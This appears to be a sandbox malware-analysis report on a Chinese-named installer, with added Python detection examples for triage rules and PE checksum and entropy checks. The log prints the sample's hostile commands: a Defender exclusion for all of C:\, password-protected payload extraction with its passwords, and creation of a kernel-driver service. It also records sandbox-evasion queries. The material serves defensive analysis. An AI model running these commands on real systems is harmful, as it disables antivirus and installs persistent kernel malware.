Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp "C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
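Three of the process-creation entries above are the ones a responder would want flagged automatically: a Defender exclusion for the whole C:\ drive, password-protected 7zr extraction of res.dat and locale3.dat, and a service created with type= kernel whose binPath is a .dll under Program Files (x86)\Windows NT rather than a .sys under System32\drivers. The Python below is an added example, not part of the Joe Sandbox report and not sandbox signature code: it parses rows in the report's "Source: ... Process created: ..." layout and applies those three rules. The log lines embedded in it are constructed to mirror this report (the ExampleDrv entry is an invented benign-looking control), and the rule names, severities and the drive-root heuristic are assumptions of this example.

```python
"""Triage rules over sandbox process-creation rows (added example, not from the report)."""
import re
from dataclasses import dataclass

# Constructed log modelled on this report's "Source: ... Process created: ..." rows.
# The ExampleDrv row is invented as a benign-looking control; it is not in the report.
LOG = r"""
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\setup.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\setup.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ExampleDrv binPath= "C:\Windows\System32\drivers\exampledrv.sys" type= kernel start= demand
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
"""

# Accepts the raw report layout ("...exeProcess created:") as well as a " | " separated one.
ENTRY_RE = re.compile(
    r"^Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*"
    r"(?P<image>.+?\.exe)(?:\s+(?P<cmdline>.*))?$",
    re.IGNORECASE,
)
SC_OPT_RE = re.compile(r'(\w+)=\s*("[^"]*"|\S+)')          # sc.exe "key= value" pairs
EXCLUSION_RE = re.compile(
    r'''Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+['"]?([^'"]+)''', re.I)


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def parse_entries(text: str):
    """Return (parent, image, command line) for every row in the report's layout."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append((m["parent"], m["image"], m["cmdline"] or ""))
    return entries


def check_defender_exclusion(image, cmdline):
    """Add-MpPreference exclusions; excluding a whole drive root is the worst case."""
    m = EXCLUSION_RE.search(cmdline)
    if not m:
        return None
    kind, target = m.group(1), m.group(2).strip()
    severity = "high" if re.fullmatch(r"[A-Za-z]:\\?", target) else "medium"
    return Finding("defender_exclusion", severity, f"{kind} exclusion for {target}")


def check_kernel_service(image, cmdline):
    """sc create ... type= kernel whose image is not a .sys under System32\\drivers."""
    if not image.lower().endswith("\\sc.exe"):
        return None
    parts = cmdline.split(None, 2)
    if len(parts) < 3 or parts[1].lower() != "create":
        return None
    name = parts[2].split()[0]
    opts = {k.lower(): v.strip('"') for k, v in SC_OPT_RE.findall(parts[2])}
    if opts.get("type", "").lower() != "kernel":
        return None
    path = opts.get("binpath", "")
    expected = path.lower().endswith(".sys") and "\\system32\\drivers\\" in path.lower()
    if expected:
        return Finding("kernel_driver_service", "info", f"{name} -> {path}")
    return Finding("kernel_driver_service", "high",
                   f"{name} -> {path} (not a .sys under System32\\drivers)")


def check_password_archive(image, cmdline):
    """7-Zip extraction with an inline -p password: the payload is opaque to static scanning."""
    if image.rsplit("\\", 1)[-1].lower() not in ("7z.exe", "7za.exe", "7zr.exe"):
        return None
    if not re.search(r"(?:^|\s)-p(\S+)", cmdline):
        return None
    archive = re.search(r"\b[xe]\s+(?:-\S+\s+)*(\S+)", cmdline)   # first non-switch after x/e
    return Finding("password_protected_extract", "medium",
                   f"{archive.group(1) if archive else '?'} (password supplied on the command line)")


RULES = (check_defender_exclusion, check_kernel_service, check_password_archive)


def triage(text: str):
    """Run every rule over every row; findings keep the row order of the input."""
    findings = []
    for _parent, image, cmdline in parse_entries(text):
        for rule in RULES:
            f = rule(image, cmdline)
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(LOG):
        print(f"[{f.severity:>6}] {f.rule}: {f.detail}")
```

The kernel-service rule deliberately reports a driver that does live under System32\drivers as "info" rather than dropping it: on a host where the user is not expected to install drivers, even a well-placed one is worth a look, and the severity split keeps the Program Files (x86)\Windows NT\tProtect.dll case at the top of the list.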
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Sections loaded: uxtheme.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Sections loaded: mpr.dll, version.dll, winhttp.dll, uxtheme.dll, kernel.appcore.dll, wtsapi32.dll, winsta.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll (3 times), shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, windows.storage.dll, wldp.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (2 times), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe (second run) | Sections loaded: uxtheme.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Sections loaded: mpr.dll, version.dll, winhttp.dll, uxtheme.dll, kernel.appcore.dll, wtsapi32.dll, winsta.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll (3 times), shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, textshaping.dll, windows.storage.dll, wldp.dll, sspicli.dll, dwmapi.dll, sfc.dll, sfc_os.dll, explorerframe.dll, wininet.dll, apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Sections loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll (2 times), kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll (2 times), gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Static file information: File size 9026305 > 1048576
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb | source: 7zr.exe, 0000000C.00000003.2164014609.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2163901201.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount | 9_2_005E57D0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Static PE information: real checksum: 0x0 should be: 0x89f7e2
Source: update.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: update.vbc.2.dr | Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x3436dd
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x3436dd
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr | Static PE information: section name: .didata
Source: update.vbc.2.dr | Static PE information: section name: .00cfg
Source: update.vbc.2.dr | Static PE information: section name: .voltbl
Source: update.vbc.2.dr | Static PE information: section name: .aQ#
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .aQ#
Source: update.vbc.6.dr | Static PE information: section name: .00cfg
Source: update.vbc.6.dr | Static PE information: section name: .voltbl
Source: update.vbc.6.dr | Static PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CB6BDDB push ecx; ret | 6_2_6CB6BDEE
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CA10F00 push ss; retn 0001h | 6_2_6CA10F0A
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CB9E9F4 push 004AC35Ch; ret | 6_2_6CB9EA0E
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CC3A290 push eax; ret | 6_2_6CC3A2BE
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp | Code function: 6_2_6CC39F10 push eax; ret | 6_2_6CC39F2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_005645F4 push 0060C35Ch; ret | 9_2_0056460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_005FFB10 push eax; ret | 9_2_005FFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_005FFE90 push eax; ret | 9_2_005FFEBE
Source: update.vbc.2.dr | Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.dr | Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.dr | Static PE information: section name: .aQ# entropy: 7.189081398239323
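The "real checksum: 0x0 should be: ..." and ".aQ# entropy: 7.18" entries are cheap static indicators worth reproducing in your own tooling. A stored CheckSum of zero is common in user-mode binaries and is not checked when they load, so on its own it means little; tProtect.dll is the interesting case because it carries a non-zero value that does not match and is then registered as a kernel driver, which is expected to carry a valid checksum. An oddly named section with entropy close to the 8-bit maximum, as seen for .aQ# in update.vbc and hrsw.vbc, is the usual sign of packed or encrypted content. The Python below is an added example, not part of the report: it builds a tiny synthetic PE32 image in memory (constructed input, not one of the report's files), recomputes the header checksum with the usual re-implementation of the CheckSumMappedFile algorithm, compares it with the stored value, and scores each section's Shannon entropy against a 7.0 bits-per-byte threshold that is an assumption of this example.

```python
"""PE CheckSum and section-entropy checks (added example, not from the report)."""
import math
import struct

ENTROPY_THRESHOLD = 7.0   # assumption: bits/byte above which a section looks packed


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Re-implementation of the CheckSumMappedFile algorithm: one's-complement 16-bit
    sum over the file, skipping the 4-byte CheckSum field, plus the file length."""
    buf = data + (b"\0" if len(data) % 2 else b"")
    total = 0
    for off in range(0, len(buf), 2):
        if checksum_offset <= off < checksum_offset + 4:
            continue
        total += struct.unpack_from("<H", buf, off)[0]
        total = (total & 0xFFFF) + (total >> 16)      # fold the carry back in
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(data)


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not blob:
        return 0.0
    n = len(blob)
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes):
    """Return (stored CheckSum, its file offset, [(section name, raw bytes), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24              # optional header follows the 20-byte COFF header
    cks_off = opt + 64               # CheckSum field offset, same for PE32 and PE32+
    stored = struct.unpack_from("<I", data, cks_off)[0]
    sections, table = [], opt + opt_size
    for i in range(nsect):
        hdr = data[table + 40 * i: table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)   # SizeOfRawData, PointerToRawData
        sections.append((name, data[raw_ptr:raw_ptr + raw_size]))
    return stored, cks_off, sections


def analyze(data: bytes, threshold: float = ENTROPY_THRESHOLD) -> dict:
    """The two indicators the sandbox prints: checksum mismatch and high-entropy sections."""
    stored, cks_off, sections = parse_pe(data)
    computed = pe_checksum(data, cks_off)
    secs = {}
    for name, blob in sections:
        e = shannon_entropy(blob)
        secs[name] = (round(e, 3), e >= threshold)
    return {"stored_checksum": stored, "computed_checksum": computed,
            "checksum_ok": stored == computed, "sections": secs}


def fix_checksum(data: bytes) -> bytes:
    """Write the computed checksum into the header, as a linker would have done."""
    _, cks_off, _ = parse_pe(data)
    buf = bytearray(data)
    struct.pack_into("<I", buf, cks_off, pe_checksum(data, cks_off))
    return bytes(buf)


def build_pe(sections, stored_checksum: int = 0) -> bytes:
    """Constructed input: a minimal PE32 file with the given sections. Not loadable,
    just enough header structure for the checks above (0x200 file alignment)."""
    n = len(sections)
    opt_size = 96                                   # standard PE32 fields, no data directories
    hdr_len = 0x40 + 4 + 20 + opt_size + 40 * n
    data_start = (hdr_len + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 64, stored_checksum)
    table, body, ptr = b"", b"", data_start
    for name, payload in sections:
        size = (len(payload) + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(payload), 0x1000, size, ptr, 0, 0, 0, 0, 0x60000020)
        body += payload.ljust(size, b"\0")
        ptr += size
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(data_start, b"\0")
    return headers + body


# Constructed sample: a low-entropy code section and a high-entropy section named like
# the one flagged in the report, with the CheckSum field left at zero.
SAMPLE = build_pe([(".text", bytes(range(16)) * 32), (".aQ#", bytes(range(256)) * 2)])

if __name__ == "__main__":
    for label, image in (("as built", SAMPLE), ("after fix_checksum", fix_checksum(SAMPLE))):
        r = analyze(image)
        print(f"{label}: stored=0x{r['stored_checksum']:x} computed=0x{r['computed_checksum']:x} "
              f"ok={r['checksum_ok']} sections={r['sections']}")
```

Run against a real dropped file by passing its bytes to analyze(); the entropy threshold is deliberately a parameter because compressed resources and certificates also score high, so the section name and its characteristics should be read alongside the number rather than treated as a verdict.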
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6804
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2805
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Window / User API: threadDelayed 645
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Window / User API: threadDelayed 648
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Window / User API: threadDelayed 594
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
